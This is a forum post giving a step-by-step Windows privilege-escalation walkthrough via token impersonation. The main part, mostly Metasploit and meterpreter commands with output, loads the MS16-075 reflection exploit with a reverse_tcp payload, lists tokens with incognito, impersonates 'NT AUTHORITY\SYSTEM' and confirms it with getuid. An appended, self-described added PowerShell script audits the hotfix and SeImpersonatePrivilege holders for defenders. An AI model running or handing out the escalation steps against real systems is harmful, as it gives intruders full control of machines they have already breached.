Token Impersonation Attack - Privilege Escalation

ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Postby ltx_Lazzarus » Fri May 03, 2024 8:44 pm

Token Impersonation
Some buggers might try to copy and pretend to be another bloke's token to get more power and sneak past the security checks. A cheeky one can make a new access token that's the same as an existing one using DuplicateToken(Ex). Then they can use ImpersonateLoggedOnUser to make the calling thread act like a logged-on user's security thingy.

In this how-to, we'll be having a go at doing a token impersonation attack.

For this part, our target system will be runnin' Windows 7. Before we start, make sure you've already got your foot in the door on the system and have a meterpreter session goin'.

Let's get stuck into it by followin' these steps:

First up, we need to find any weak spots that can be exploited through the Potato attack. We can do this by usin' the Windows Exploit Suggester script:

./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>

After runnin' that script, we can spot a token impersonation weak spot. Lookin' into the MS16-075 vulnerability, we find a Metasploit module that can do the token impersonation attack automatically.

To load the module in Metasploit, run this:

msf> use exploit/windows/local/ms16_075_reflection

Once it's loaded, you gotta set the module options. Do that by runnin' these commands:

msf> set payload windows/x64/meterpreter/reverse_tcp

msf> set SESSION <SESSION-ID>

Now we're ready to run the module. Just type this:

msf> run

Alright, next up we gotta do the impersonation bit. We can do that by loadin' the incognito module on the meterpreter. Just run this command:

meterpreter> load incognito

Now we can use incognito to list all the tokens we can impersonate. Run this:

meterpreter> list_tokens -u

Have a look at that, we can see the "NT AUTHORITY\SYSTEM" token there. Ripper!

Alright, let's impersonate that "NT AUTHORITY\SYSTEM" token. Run this command:

meterpreter> impersonate_token "NT AUTHORITY\SYSTEM"

Now let's check that we've got those sweet, sweet elevated privileges. Run this in the meterpreter:

meterpreter> getuid

Boom, just like that we've successfully jacked up our access!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
stopthe4ttack.box
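A defender-side companion to the post above, written as an added example and not part of the original post or of Metasploit/incognito: the walkthrough works because the host is missing the MS16-075 fix and because the account running the compromised process holds SeImpersonatePrivilege (the user right every Potato-style token attack depends on). This script checks both on the local host. It assumes the MS16-075 hotfix ships as KB3164038 (verify against the vendor bulletin for your OS build), that secedit.exe is present, and that it runs in an elevated PowerShell (secedit needs administrator rights); the function names are the author's own.

```powershell
# Added example (not from the original post): audit the two preconditions
# of the MS16-075 / Potato-style token impersonation attack on this host.
# Assumption: MS16-075 corresponds to KB3164038 - check the bulletin for your build.
$Ms16075Kb = 'KB3164038'

function Test-Ms16075Patched {
    # Get-HotFix queries Win32_QuickFixEngineering; $true if the KB is listed.
    $hotfix = Get-HotFix -Id $Ms16075Kb -ErrorAction SilentlyContinue
    return [bool]$hotfix
}

function Get-ImpersonatePrivilegeHolders {
    # Export only the user-rights area of local security policy to a temp .inf
    # and pull the SIDs assigned SeImpersonatePrivilege (exported as "*S-1-5-...").
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    try {
        & secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $line = Get-Content $cfg | Where-Object { $_ -match '^SeImpersonatePrivilege\s*=' }
        if (-not $line) { return @() }
        $sids = ($line -split '=', 2)[1].Trim() -split ',' |
                ForEach-Object { $_.Trim().TrimStart('*') }
        foreach ($sid in $sids) {
            $name = $sid
            try {
                # Translate the SID to an account name; keep the raw SID if lookup fails.
                $name = (New-Object System.Security.Principal.SecurityIdentifier($sid)).
                            Translate([System.Security.Principal.NTAccount]).Value
            } catch { }
            New-Object PSObject -Property @{ Sid = $sid; Account = $name }
        }
    } finally {
        Remove-Item $cfg -ErrorAction SilentlyContinue
    }
}

# Usage: run in an elevated PowerShell session.
if (Test-Ms16075Patched) {
    "MS16-075 ($Ms16075Kb) is installed."
} else {
    "MS16-075 ($Ms16075Kb) NOT found - host is likely exposed to the attack above."
}
"Accounts holding SeImpersonatePrivilege (Potato-style attacks need this right):"
Get-ImpersonatePrivilegeHolders | Format-Table Account, Sid -AutoSize
```

By default only Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE hold SeImpersonatePrivilege; any extra entry in that list (a web-application or database service account, for instance) widens the set of processes from which the impersonation step in the post could be launched, and is worth reviewing alongside the patch status.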